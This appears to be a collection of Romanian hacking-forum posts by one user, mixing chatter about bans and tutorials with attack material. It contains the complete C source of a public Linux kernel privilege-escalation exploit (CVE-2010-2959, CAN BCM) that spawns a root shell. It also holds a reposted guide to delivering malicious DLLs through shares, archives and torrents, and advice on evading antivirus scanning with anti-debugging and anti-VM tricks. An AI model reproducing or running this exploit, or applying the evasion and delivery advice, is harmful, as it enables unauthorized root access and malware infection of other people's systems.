Nytro

Preview: http://i38.tinypic.com/33epzbs.png Download: http://www.mediafire.com/?xh8r3w7vsewb812 http://www.speedyshare.com/files/24009517/c-programming-in-linux.pdf

Mersi. O sa mai fie cate ceva

Il mai incearca cineva? Nu merge la mine, "Symbol table not available, aborting". /* * i-CAN-haz-MODHARDEN.c * * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 * * Ben Hawkes discovered an integer overflow in the Controller Area Network * (CAN) subsystem when setting up frame content and filtering certain * messages. An attacker could send specially crafted CAN traffic to crash * the system or gain root privileges. * * Usage: * * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden * $ ./i-can-haz-modharden * ... * [+] launching root shell! * # id * uid=0(root) gid=0(root) * * Notes: * * The allocation pattern of the CAN BCM module gives us some desirable * properties for smashing the SLUB. We control the kmalloc with a 16-byte * granularity allowing us to place our allocation in the SLUB cache of our * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for * old-times sake). The allocation can also be made in its own discrete * stage before the overwrite which allows us to be a bit more conservative * in ensuring the proper layout of our SLUB cache. * * To exploit the vulnerability, we first create a BCM RX op with a crafted * nframes to trigger the integer overflow during the kmalloc. On the second * call to update the existing RX op, we bypass the E2BIG check since the * stored nframes in the op is large, yet has an insufficiently sized * allocation associated with it. We then have a controlled write into the * adjacent shmid_kernel object in the 96-byte SLUB cache. * * However, while we control the length of the SLUB overwrite via a * memcpy_fromiovec operation, there exists a memset operation that directly * follows which zeros out last_frames, likely an adjacent allocation, with * the same malformed length, effectively nullifying our shmid smash. To * work around this, we take advantage of the fact that copy_from_user can * perform partial writes on x86 and trigger an EFAULT by setting up a * truncated memory mapping as the source for the memcpy_fromiovec operation, * allowing us to smash the necessary amount of memory and then pop out and * return early before the memset operation occurs. * * We then perform a dry-run and detect the shmid smash via an EIDRM errno * from shmat() caused by an invalid ipc_perm sequence number. Once we're * sure we have a shmid_kernel under our control we re-smash it with the * malformed version and redirect control flow to our credential modifying * calls mapped in user space. * * Distros: please use grsecurity's MODHARDEN or SELinux's module_request * to restrict unprivileged loading of uncommon packet families. Allowing * the loading of poorly-written PF modules just adds a non-trivial and * unnecessary attack surface to the kernel. * * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports * easily to other vulnerable kernels/distros. Careful, it could use some * post-exploitation stability love as well. * * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that * this exploit borrows code from. */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h> #define SLUB "kmalloc-96" #define ALLOCATION 96 #define FILLER 100 #ifndef PF_CAN #define PF_CAN 29 #endif #ifndef CAN_BCM #define CAN_BCM 2 #endif struct sockaddr_can { sa_family_t can_family; int can_ifindex; union { struct { uint32_t rx_id, tx_id; } tp; } can_addr; }; struct can_frame { uint32_t can_id; uint8_t can_dlc; uint8_t data[8] __attribute__((aligned(8))); }; struct bcm_msg_head { uint32_t opcode; uint32_t flags; uint32_t count; struct timeval ival1, ival2; uint32_t can_id; uint32_t nframes; struct can_frame frames[0]; }; #define RX_SETUP 5 #define RX_DELETE 6 #define CFSIZ sizeof(struct can_frame) #define MHSIZ sizeof(struct bcm_msg_head) #define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8 struct list_head { struct list_head *next; struct list_head *prev; }; struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; } super_block; struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; }; struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; } inode; struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; } dentry; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; } op; struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; } vfsmount; struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; } file; struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; }; struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; } shmid_kernel; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int check_slabinfo(char *cache, int *active_out, int *total_out) { FILE *fp; char name[64], slab[256]; int active, total, diff; memset(slab, 0, sizeof(slab)); memset(name, 0, sizeof(name)); fp = fopen("/proc/slabinfo", "r"); if (!fp) { printf("[-] sorry, /proc/slabinfo is not available!"); exit(1); } fgets(slab, sizeof(slab) - 1, fp); while (1) { fgets(slab, sizeof(slab) - 1, fp); sscanf(slab, "%s %u %u", name, &active, &total); diff = total - active; if (strcmp(name, cache) == 0) { break; } } fclose(fp); if (active_out) { *active_out = active; } if (total_out) { *total_out = total; } return diff; } void trigger(void) { int *shmids; int i, ret, sock, cnt, base, smashed; int diff, active, total, active_new, total_new; int len, sock_len, mmap_len; struct sockaddr_can addr; struct bcm_msg_head *msg; void *efault; char *buf; printf("[+] creating PF_CAN socket...\n"); sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); if (sock < 0) { printf("[-] kernel lacks CAN packet family support\n"); exit(1); } printf("[+] connecting PF_CAN socket...\n"); memset(&addr, 0, sizeof(addr)); addr.can_family = PF_CAN; ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); if (sock < 0) { printf("[-] could not connect CAN socket\n"); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959; msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1; printf("[+] clearing out any active OPs via RX_DELETE...\n"); msg->opcode = RX_DELETE; ret = send(sock, msg, len, 0); printf("[+] removing any active user-owned shmids...\n"); system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;"); printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n"); diff = check_slabinfo(SLUB, &active, &total); shmids = malloc(sizeof(int) * diff * 10); cnt = diff * 10; for (i = 0; i < cnt; ++i) { diff = check_slabinfo(SLUB, &active, &total); if (diff == 0) { break; } shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } base = i; if (diff != 0) { printf("[-] inconsistency detected with SLUB cache allocation, please try again\n"); exit(1); } printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n"); i = base; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP; ret = send(sock, msg, len, 0); if (ret < 0) { printf("[-] kernel rejected malformed CAN header\n"); exit(1); } i = base + FILLER; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n"); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault); printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n"); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959; msg->nframes = (ALLOCATION / 16) * 4; msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!\n"); exit(1); } printf("[+] seeking out the smashed shmid_kernel...\n"); i = base; cnt = i + FILLER + FILLER; for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf("[-] could not find smashed shmid, trying running the exploit again!\n"); exit(1); } printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]); printf("[+] re-smashing the shmid_kernel with exploit payload...\n"); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!\n"); exit(1); } ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0); printf("[+] launching root shell!\n"); execl("/bin/bash", "/bin/bash", NULL); exit(0); } printf("[-] exploit failed! retry?\n"); } void setup(void) { printf("[+] looking for symbols...\n"); commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("[-] symbol table not availabe, aborting!\n"); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] symbol table not availabe, aborting!\n"); } printf("[+] setting up exploit payload...\n"); super_block.s_flags = 0; inode.i_size = 4096; inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1; dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode; op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code; vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1; file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op; shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = getuid(); shmid_kernel.shm_perm.gid = getgid(); shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; } int main(int argc, char **argv) { setup(); trigger(); return 0; } nytro@rst:~> uname -a Linux rst 2.6.34-12-default #1 SMP 2010-06-29 02:39:08 +0200 i686 i686 i386 GNU/Linux http://www.exploit-db.com/exploits/14814/

Faci cum iti e mai usor. Da, poti sa pui calea, asa cred ca ar fi cel mai bine. Eventual sa mai pui si un mirror sau doua. Si versiunea programului curent o salvezi intr-un fisier, sa nu te complici...

AlStar: Nu poti intra pe forum. Iti apare doar mesajul ca "You are banned" si motivul. La warn-urile mele, motivul e "Warns", adica avertismentele sunt de vina. Da, banurile nu expira niciodata, cu mult timp in urma expirau. Dar am intervenit eu

# Visit Exploiting DLL Hijack in the real world to see a html version of this paper # ---------------------------------------------------------------------------- # Title: Exploiting DLL Hijack in the real world # Date: 27/08/2010 # Author: Bruno Filipe (diwr) - bmilreu[]at[]gmail.com # ---------------------------------------------------------------------------- Dll hijacking is the new hype on Windows exploiting. This vulnerability is caused by a misbehavior practiced by all versions of Windows, as far as I’m concerned. This misbehavior can be found explained in this MSDN page <link at bottom> (see Remarks). Note that many people consider this flaw a feature and not a real bug because it was intended to be made this way by Microsoft. I strongly disagree as I can’t think of a single legitimate usage of a dll being loaded from the same directory of a opened file. I won’t go into minor details about this issue, as they can be found in reference links at the bottom of this article. I recommend reading them first if you don’t know what Dll Hijacking is. Basically, it works by creating a custom malicious dll and putting it in the same directory of a clean file. When this clean file is opened by a vulnerable application, your custom dll will be loaded and your code executed. This malicious dll must have specific filenames for each vulnerable application, which can be discovered using any simple debugging tool. There are vulnerabilities in many major programs, so it’s possible to bundle a dll with almost any filetype, like pdf, html, jpg, mp3, avi, ANYTHING. Even some programs included with Windows are vulnerable. Peter Eeckhoute from corelan team started an unofficial list that you might want to check <link at bottom>. You’re almost certainly using many exploitable applications so it’s a must to check there if you use Windows regardless of it’s version or edition. This is a major security issue that affects every Windows version and cannot be patched universally as it would break many existing applications. Inside this article I’ll also provide some tips about how you can try to protect yourself and your network. There’s no bullet-proof solution at this moment but you can certainly avoid getting exploited in many cases. This article is focused on showing how this flaw can be exploited in a real world scenario from an attacker’s side. This is important because there are many possible attack vectors that can be used either making use of another vulnerability or even some simple social engineering. I’ll explain some of them and how can be possibly avoided by an user or sysadmin. * Using a SMB/WebDav shared folder This is perhaps the most common way dll hijacking is being used, probably because it can be exploited remotely. There are already a module for Metasploit which uses this vector. It works by putting together a malicious dll and a clean file that triggers it inside a share and then making your target open this clean file. Remember a shared folder link always starts with double slashes like \\123.45.67.890. Real world examples: 1. Attacker sends a shared folder link to a victim. Victim opens and sees some .html files and double-clicks one of them. When a vulnerable browser or application opens this file it loads a dll directly from this share, and victim is now infected. 2. Attacker posts a link in a forum that looks like a http link but redirects victim to a shared folder. Victim opens a simple .pdf file and gets infected. 3. Attacker gains access to a trusty website and puts iframes or redirects to his share. Victim trusts this site and opens a mp3 file inside the shared folder and… gets infected as well. 4. Attacker uses the .lnk bug or any browser vulnerability together with any of above examples and thus increase his infect rate. Tip: This kind of attack can be neutralized blocking any outbound connection to a smb/webdav share. Ports are 445 and 135. * A compressed package (.zip, .tar.gz, .rar etc) This vector can be exploited by putting together a bunch of clean files and a malicious dll inside a compressed folder/package. Target will extract these files and open one of them, getting attacker’s dll loaded. Real world example: 1. Attacker compresses 30 jpg pictures and a dll in a zip file. Victim extracts everything to a folder and double-clicks one of the pictures. Infected. I won’t provide any other example of this because it’d look the same. Tip: Before opening any kind of file, specially downloaded from the internet, check if there’s any dll file in the same directory. Don’t forget to enable show hidden files and show all extensions on your Folder Options. It’s also recommended to move only the files you need to open to another directory created by you. This should make you safe. * Torrents This one is kinda nasty and can be very effective to contaminate large amounts of people. A torrent can contain large numbers of files and can be used to get a malicious dll downloaded together with clean files without being noticed. This is very dangerous, specially if a big torrent tracker or database can be compromised. Real world examples: 1. Attacker posts a custom torrent in a public tracker, which contains a pack of mp3?s and a malicious dll. Victim goes listen it’s new song album and get infected. 2. Attacker gains admin access to a torrent database (this actually happened to ThePirateBay not so long ago) and changes a legitimate high-traffic torrent for a infected one. This could cause a massive infection in a matter of minutes. Tip: Same tip as above. Make sure there are no dlls in the current folder before opening any kind of file. If you own a tracker or database make sure your webserver and/or database are not vulnerable to any kind of vulnerability like SQL injections, XSS etc. * Exploiting multiple application hijacks We have not seen yet a real world malware that uses dll hijacks to it’s max but one of the ways attackers can (and will) use to increase their success rate is putting multiple dlls to exploit the same filetype. Real world example: * Attacker shares a folder which contains a bunch of .avi files and three malicious dlls: one for VLC, other for MediaPlayer Classic and, finally, the last one for Winamp. Attacker can now exploit three apps in the same attack, increasing the chance of victim getting infected. These are just some of the many ways we might seem this breach being exploited in real world in a very near future. You might wanna check all vulnerable apps and discover your own way or you can also try to discover your own vulnerable apps using this kit, provided by HD Moore (creator of Metasploit) <link at bottom>. - Bruno Filipe (diwr) Links: [MSDN page] SetDllDirectory Function (Windows) [hdm’s DLL Hijack Audition kit and instructions] Metasploit: Better, Faster, Stronger: DLLHijackAuditKit v2 [Rapid7 Blog advisory about DLL Hijacking flaw] Application DLL Load Hijacking Rapid7 Network Security Blog [Corelan blog – Unofficial list of vulnerable apps] http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/ [exploit-db list of vulnerable apps] DLL Hijacking – Vulnerable Applications [sample DreamWeaver CS5 exploit] Adobe Dreamweaver CS5 <= 11.0 build 4909 DLL Hijacking Exploit (mfc90loc.dll)

Depinde cat de mult vrei sa te complici. Poti face o alta aplicatie sau aceeasi aplicatie, update-ul depinde de ceea ce descarci. Sa verifici daca e o versiune noua e usor, faci un fisier XML banal sau orice fisier in care, atunci cand faci o noua versiune, treci noua versiune, iar aplicatia responsabila cu update-ul verifica daca versiunea curenta e mai veche. Apoi, descarci noua aplicatie. Ar fi bine sa faci un mic installer, care sa verifice daca programul curent ruleaza,c e versiune este, si ce ar fi de modificat: pot fi de modificat DLL-uri sau alte imagini sau prostii care pot fi deschise de program, ideala ar fi inchiderea programului care trebuie updatat, ori sa se inchida singur, ori updater-ul sa il inchida.

Exemplu de post care a primit avertisment (warn) si cum mai erau si altele, a devenit ban

RAR Password Cracker - Recovery (crack) of lost RAR/WinRAR passwords ?

ACTUALIZARE: AICI. Sa explic, sa inteleaga toata lumea. Pentru o abatere nu foarte grava, pentru care nu se poate da ban (to ban = a interzice, provine din limba engleza si s-a cam romanizat, folosim verbul "a bana" si "ban" folosim pentru interdictie, deci daca ai ban nu mai intrii pe forum), se da un avertisment. Pana acum, la 3 avertismente se primea ban automat 3 zile, la 4 avertismente ban 4 zile, la 5 se primea 5 zile si la 6 permanent. Ceea ce era cam dragut pentru voi, nu meritati asa ceva. Asadar, am facut cateva mici modificari la banurile automate. Un mic tabel care contine: numarul de avertismente | durata banului: - 3 avertismente - ban 5 zile - 4 avertismente - ban 10 zile - 5 avertismente - ban 30 de zile (o luna) - 6 avertismente - ban permanent Ma bucur ca va place. O zi buna

E putin exagerata povestea, dar sunt si cazuri asemanatoare. Se intreaba lumea cum de ajung sa faca copii de la 12 ani, pai daca nu stiu nici cate gauri au... Si parasutele te dau in judecata ca le-ai violat...

(06:48:57 AM) Nytro: Dai o bere sa nu iti dau ban? (06:49:03 AM) Pax Nwo: )) (06:49:05 AM) Pax Nwo: dau bere S-a rezolvat

Continuatii, ka nu am yo threaba cu woi.

Eu ma ocup si cu altceva in afara de Facebook. Am incercat o noua reteta de clatite cu crema de prajituri si nuca de cocos si a iesit ca pula, am mancat 3 si imi venea sa vomit

Este doar prima parte, il voi continua, e decat inceputul. Am pus exemple si pentru C++ si pentru Visual Basic 6, si cred ca din explicatii poate intelege oricine despre ce e vorba. Pre-vizualizare http://i38.tinypic.com/r74njc.png Download: http://filetransfer.ro/uploads/8Tutorial_Windows_Sockets_API.pdf http://rapidshare.com/files/415254254/Tutorial_Windows_Sockets_API.pdf http://www.speedyshare.com/files/23976395/Tutorial_Windows_Sockets_API.pdf http://www.filescube.com/d/df4d2b6c8e4f303b05dcea698f952921/83012fcddd3a61b2d2d2c31e910e8c9d/ http://www.netdrive.ws/333159.html http://www.server-upload.com/r5z7hgutvrte http://www.filehost.ro/1387331/Tutorial_Windows_Sockets_API_pdf/ http://www.girlshare.ro/1526066.3 Am pus mai multe mirror-uri, sa fiu sigur. Astept orice intrebare legata de ce e prezentat in articol. Bafta.

Eu am si Hi5 (inchis) si facebook Sunt cocalar Ascult manele Sa moara toti dusmanii mei!

Currently Active Users Viewing This Thread: 34 (13 members and 21 guests) Wtf?

Deh, nu mai aparusera de mult ratati, chiar imi era dor sa mai rad putin.

E un pusti ala, nebunu68 sau cum isi zice, nu ai ce ii cere, nu prea il duce capul.

Dragut. Pacat ca nu pot testa de pe Linux. Se poate face o arhiva cu fisierul ppt/s si acest dll sa fie hidden, desi nici nu ar fi necesar.

Nu prea cred. A luat si el o sursa, a scris pe ea "BY VASILE" si gata. Nu are de unde sa aiba un crypter asa bun

Cred ca am facut o greseala, cred ca "hackerii din ei", din grupul de ratati care a hexat asta, o sa sparga RST. Porcaria hexata era asta modificata: http://www.hackmeout.net/archive/index.php/thread-322.html Asadar, avem din nou ratati superiori printre noi. Mue lor

Pentru scantime e usor de trecut de un antivirus. untime e ceva mai greu, dar nu foarte dificil. Sunt multe "Anti-Shits" care detecteaza daca sunt detectate in mediu virtual sau daca e pornit vreun debugger si alte prostii, sunt surse publice care se pot implementa. Delay-ul ajuta la VB6, la main, e de preferat un Timer in locul Main-ului. Ce setari la firewall? Cat despre "accesul" la un AV, nu prea se poate, decat foarte naspa, au Self-Defence, Kaspersky cel putin are driver de nivel ring0, si am inteles ca si daca scapi de el, dupa reboot ai probleme...

Hexat. Ban! http://www.hackforums.net/archive/index.php/thread-171197.html

Cand o sa fie gata RSTCore, acel proiect, voi face un mic tutorial.